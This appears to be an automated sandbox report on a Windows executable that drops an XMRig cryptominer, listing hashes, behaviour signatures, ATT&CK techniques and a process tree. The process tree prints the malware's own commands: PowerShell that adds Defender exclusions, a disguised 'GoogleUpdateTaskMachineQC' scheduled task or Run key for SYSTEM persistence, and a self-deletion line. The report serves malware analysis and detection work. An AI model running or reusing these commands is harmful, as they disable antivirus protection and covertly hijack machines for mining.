Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1801s
  • max time network
    1799s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/Y2JYGshMHJGuGREA.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe
    "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    PID:2208
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2340
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2692
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2868
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2572
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:1248
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1988
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:808
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2036
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1848
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
              3⤵
              • Creates scheduled task(s)
              PID:2820
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:1712
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:1684
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:2004
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1192
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {758E5A9F-51F4-493D-9A85-214CC9ADB011} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:664
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:576
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1628

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          18KB

          MD5

          eddbdce92da81763dc3b8376e6dcf0af

          SHA1

          ec1febbde9133487deda900acc2a46f665e76125

          SHA256

          910f3a35f19532240397ad643798801db2ef47ff4253e26b0c7e822fe417522f

          SHA512

          c2be4f892c0eee9dd77ee9ef5ad4d3f25e2f0360fcc1198855996c861e6640e3bcf8b983fc7604e9a237dac2fe7c7f4349cb66666b82d3786746fb2ef9bb20e8

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          1.5MB

          MD5

          041614b492a1fb55979a44ca82d46e91

          SHA1

          d88abfc8d8275fdc3a69f5884da158480489487b

          SHA256

          d27d23b8585703c6a2c67c96ba4b509f35ae9712de8e2dbc968f1937bb6f2e64

          SHA512

          6052067c1eb9b0205ec1877f913833b39039b5c973f8a3447923faffaab0c69cc8b123ed3c3c74f77820e0e853fcb5838b8fb27f9e4e9f4551a42db72c7bfca2

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7C7KTCQ6SCA8AQEOMVG0.temp
          Filesize

          7KB

          MD5

          a40b0953916e703898c86a47493e342c

          SHA1

          f9f06966e61afb93212f3618a0334e88222ee051

          SHA256

          718564c37e1a2733c4c41fbc457032136ed2d9ee3828d25253c73842a91d860c

          SHA512

          a85f2f05e389da3a8706b6a3b8844994d2c0839280684884a05a6e7abf0fa28937b39f070624a3ad5b310f10c1816ffbb430b2d1b86e8a7fe4180b3c593ca091

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          54KB

          MD5

          c008cc9ee9a1a1619e08ce7ece1e81af

          SHA1

          68b3b64702390b8776618dc7ed99a0b835da74e4

          SHA256

          61d1b7d7cd97417f400cedc9146a052e0785f1d154edcb48e227671def9e57d4

          SHA512

          5735ded32232c19983acea3ed0c373359bd4585bbaf7f138c3730e6d209e21cf0b5233d46881a3f1af96ed1ed875f9906b1b27d4d22fc4e0254467ecd14594aa

        • memory/576-64-0x000000013FD00000-0x000000013FF11000-memory.dmp
          Filesize

          2.1MB

        • memory/576-44-0x000000013FD00000-0x000000013FF11000-memory.dmp
          Filesize

          2.1MB

        • memory/1192-93-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-85-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-113-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-117-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-111-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-109-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-107-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-105-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-103-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-101-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-99-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-97-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-95-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-119-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-91-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-89-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-87-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-115-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-83-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-81-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-121-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-123-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-125-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-79-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-76-0x00000000007D0000-0x00000000007F0000-memory.dmp
          Filesize

          128KB

        • memory/1192-77-0x0000000000800000-0x0000000000820000-memory.dmp
          Filesize

          128KB

        • memory/1192-75-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-74-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-72-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-70-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-68-0x0000000000800000-0x0000000000820000-memory.dmp
          Filesize

          128KB

        • memory/1192-67-0x00000000007D0000-0x00000000007F0000-memory.dmp
          Filesize

          128KB

        • memory/1192-65-0x00000000001B0000-0x00000000001D0000-memory.dmp
          Filesize

          128KB

        • memory/1192-66-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-127-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1192-129-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1848-56-0x0000000000F10000-0x0000000000F90000-memory.dmp
          Filesize

          512KB

        • memory/1848-53-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
          Filesize

          9.6MB

        • memory/1848-54-0x0000000000F10000-0x0000000000F90000-memory.dmp
          Filesize

          512KB

        • memory/1848-55-0x0000000000F10000-0x0000000000F90000-memory.dmp
          Filesize

          512KB

        • memory/1848-51-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
          Filesize

          9.6MB

        • memory/1848-52-0x0000000000F10000-0x0000000000F90000-memory.dmp
          Filesize

          512KB

        • memory/1848-57-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
          Filesize

          9.6MB

        • memory/1988-38-0x0000000002800000-0x0000000002880000-memory.dmp
          Filesize

          512KB

        • memory/1988-35-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
          Filesize

          9.6MB

        • memory/1988-40-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
          Filesize

          9.6MB

        • memory/1988-36-0x0000000002800000-0x0000000002880000-memory.dmp
          Filesize

          512KB

        • memory/1988-37-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
          Filesize

          9.6MB

        • memory/1988-39-0x0000000002800000-0x0000000002880000-memory.dmp
          Filesize

          512KB

        • memory/2004-69-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2004-73-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2036-49-0x0000000000C40000-0x0000000000CC0000-memory.dmp
          Filesize

          512KB

        • memory/2036-45-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp
          Filesize

          9.6MB

        • memory/2036-46-0x0000000000C40000-0x0000000000CC0000-memory.dmp
          Filesize

          512KB

        • memory/2036-47-0x0000000000C40000-0x0000000000CC0000-memory.dmp
          Filesize

          512KB

        • memory/2036-48-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp
          Filesize

          9.6MB

        • memory/2036-50-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp
          Filesize

          9.6MB

        • memory/2208-0-0x000000013FDA0000-0x000000013FFB1000-memory.dmp
          Filesize

          2.1MB

        • memory/2208-29-0x000000013FDA0000-0x000000013FFB1000-memory.dmp
          Filesize

          2.1MB

        • memory/2340-11-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
          Filesize

          9.6MB

        • memory/2340-9-0x00000000024C0000-0x0000000002540000-memory.dmp
          Filesize

          512KB

        • memory/2340-6-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
          Filesize

          9.6MB

        • memory/2340-5-0x000000001B120000-0x000000001B402000-memory.dmp
          Filesize

          2.9MB

        • memory/2340-8-0x00000000022D0000-0x00000000022D8000-memory.dmp
          Filesize

          32KB

        • memory/2340-10-0x00000000024C0000-0x0000000002540000-memory.dmp
          Filesize

          512KB

        • memory/2340-7-0x00000000024C0000-0x0000000002540000-memory.dmp
          Filesize

          512KB

        • memory/2340-12-0x00000000024C0000-0x0000000002540000-memory.dmp
          Filesize

          512KB

        • memory/2340-13-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
          Filesize

          9.6MB

        • memory/2692-19-0x000000001B230000-0x000000001B512000-memory.dmp
          Filesize

          2.9MB

        • memory/2692-22-0x00000000025A0000-0x0000000002620000-memory.dmp
          Filesize

          512KB

        • memory/2692-27-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp
          Filesize

          9.6MB

        • memory/2692-21-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp
          Filesize

          9.6MB

        • memory/2692-26-0x00000000025A0000-0x0000000002620000-memory.dmp
          Filesize

          512KB

        • memory/2692-20-0x0000000002260000-0x0000000002268000-memory.dmp
          Filesize

          32KB

        • memory/2692-23-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp
          Filesize

          9.6MB

        • memory/2692-25-0x00000000025A0000-0x0000000002620000-memory.dmp
          Filesize

          512KB

        • memory/2692-24-0x00000000025A0000-0x0000000002620000-memory.dmp
          Filesize

          512KB